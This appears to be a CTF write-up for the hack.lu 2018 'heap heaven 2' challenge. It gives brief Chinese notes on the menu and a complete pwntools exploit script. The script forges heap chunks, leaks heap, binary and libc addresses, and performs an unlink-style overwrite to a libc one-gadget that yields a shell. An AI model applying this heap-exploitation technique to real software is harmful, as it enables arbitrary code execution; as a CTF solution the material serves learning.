heap heaven 2¶
- write,指定offset和写入大小
- alloc,未实现
- free,就是free
- leak,指定offset,puts打印
#!/usr/bin/env python2 # coding: utf-8 # Usage: ./exploit.py -r/-l/-d from pwn import * import argparse import itertools IP = "arcade.fluxfingers.net" PORT = 1809 # IP = "" # PORT = 9999 context.arch = "amd64" context.log_level = 'DEBUG' context.terminal = ['tmux', 'splitw', '-h'] BIN = "./heap_heaven_2" def r(x): return io.recv(x) def ru(x): return io.recvuntil(x) def rud(x): return io.recvuntil(x, drop=True) def se(x): return io.send(x) def sel(x): return io.sendline(x) def pick32(x): return u32(x[:4].ljust(4, '\0')) def pick64(x): return u64(x[:8].ljust(8, '\0')) parser = argparse.ArgumentParser() parser.add_argument('-d', '--debugger', action='store_true') parser.add_argument('-r', '--remote', action='store_true') parser.add_argument('-l', '--local', action='store_true') args = parser.parse_args() io = None # this is global process variable binary = ELF(BIN) if args.remote: context.noptrace = True io = remote(IP, PORT) libc = ELF("./libc.so.6") elif args.local or args.debugger: env = {"LD_PRELOAD": os.path.join(os.getcwd(), "libc.so.6")} # env = {} io = process(BIN, env=env) print io.libs() proc_base = io.libs()[ "/home/vagrant/DongFeng/hack.lu2018/pwn/heap_heaven/public/heap_heaven_2"] libc_bb = io.libs()[ '/home/vagrant/DongFeng/hack.lu2018/pwn/heap_heaven/public/libc.so.6'] # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") libc = ELF( "/home/vagrant/DongFeng/hack.lu2018/pwn/heap_heaven/public/libc.so.6") else: parser.print_help() exit() if args.debugger: gdb.attach(io, ''' b *0x{:x} b *0x{:x} b *0x{:x} c '''.format( proc_base + 0x0000000000001496, # call exit bye proc_base + 0x00000000000015FF, # free libc_bb + 0x000000000008267A, # int_free # proc_base + 0x0000000000001409 # options 2 # libc_bb + one_gg ) ) def alloc_heap(): rud("[5] : exit") sel(str(2)) def write_heap(offset, payload): rud("[5] : exit") sel("1") rud("How much do you want to write?") sel(str(len(payload))) rud("At which offset?") sel(str(offset)) sel(payload) def leak_heap(offset): rud("[5] : exit") sel("4") rud("At which offset do you want to leak?") sel(str(offset)) def free_heap(offset): rud("[5] : exit") sel("3") rud("At which offset do you want to free?") sel(str(offset)) def gen_heap(presize, size): return p64(presize) + p64(size) + "\x00" * (size-0x10-1) payload1 = gen_heap(0, 0x3a1) + gen_heap(0x3a0, 0x501) + \ gen_heap(0x500, 0x201) + gen_heap(0x200, 0x201) write_heap(0x1000, payload1) # write_heap(0, payload1) # alloc_heap() free_heap(str(0x10+0x1000)) free_heap(str(0x10+0x1000+0x3a0)) leak_heap(str(0x1000+0x3a0+0x10)) # leak_heap(str(0x1000+0x10)) data = io.recvuntil("Please", timeout=3).strip().split("\n")[0] mainarena88 = pick64(data) heap_base = mainarena88 log.critical("heap address 0x%x" % heap_base) def leak_address(address): write_heap(len(payload1)+0x1000, p64(address)) leak_heap(len(payload1)+0x1000) data = io.recvuntil("Please", timeout=3).strip().split("\n")[0] leaked = pick64(data) log.critical(hex(leaked)) return leaked bin_bye = leak_address(heap_base - 0x10) binary.address = bin_bye - 0x1670 log.critical("binary.address 0x%x" % binary.address) strtoul_libc = leak_address(binary.address + 0x0000000000003FB8) libc.address = strtoul_libc - libc.symbols["setvbuf"] log.critical("libc.address 0x%x" % libc.address) alloc_heap() mmap_offset = 0x0000000000004049 mmap_addr = leak_address(binary.address + mmap_offset) << 8 log.critical("mmap_addr 0x%x" % mmap_addr) mmap_offset = 0x0000000000004048 new_heap = p64(0) + p64(0) + p64(binary.address + mmap_offset - 8*3) + p64(binary.address + mmap_offset - 8*2) + "\x00" * (0x90 - 0x10 - 0x10) new_heap += p64(0x90) + p64(0x450) + "\x00"*0x440 + p64(0x450) + p64(0x91) + "\x00" * 0x80 + p64(0x90) + p64(0x91) log.critical("the new payload len: 0x%x" %len(new_heap)) write_heap(0, new_heap) free_heap(0x90+0x10) new_payload2 = heap_base - 0x10 write_heap(3*8, p64(new_payload2)) write_heap(0, p64(libc.address + 0xe75f0)) alloc_heap() sel("5") io.interactive()